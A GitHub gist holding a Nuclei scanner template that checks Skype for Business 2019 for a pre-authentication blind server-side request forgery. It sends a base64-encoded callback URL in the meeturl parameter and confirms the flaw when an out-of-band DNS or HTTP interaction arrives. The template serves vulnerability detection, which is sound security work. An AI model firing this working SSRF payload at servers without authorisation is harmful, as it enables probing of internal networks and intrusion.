Created
July 16, 2023 17:16
-
-
Save hateshape/3760da7b59fb66ef850b758cf65191a5 to your computer and use it in GitHub Desktop.
skype-blind-ssrf - frycos
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: skype-blind-ssrf | |
info: | |
name: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery | |
author: hateshape | |
severity: high | |
description: Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability | |
reference: | |
- https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html | |
metadata: | |
verified: true | |
tags: skype,blind-ssrf | |
variables: | |
ssrfpayload: "https://{{interactsh-url}}/?id=POC%25{1337*1337}#.xx//" | |
requests: | |
- raw: | |
- | | |
GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1 | |
Host: {{Hostname}} | |
matchers-condition: or | |
matchers: | |
- type: word | |
name: match-dns | |
part: interactsh_protocol # Confirms the DNS Interaction | |
words: | |
- "dns" | |
- type: word | |
name: match-http | |
part: interactsh_protocol # Confirms the HTTP Interaction | |
words: | |
- "http" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment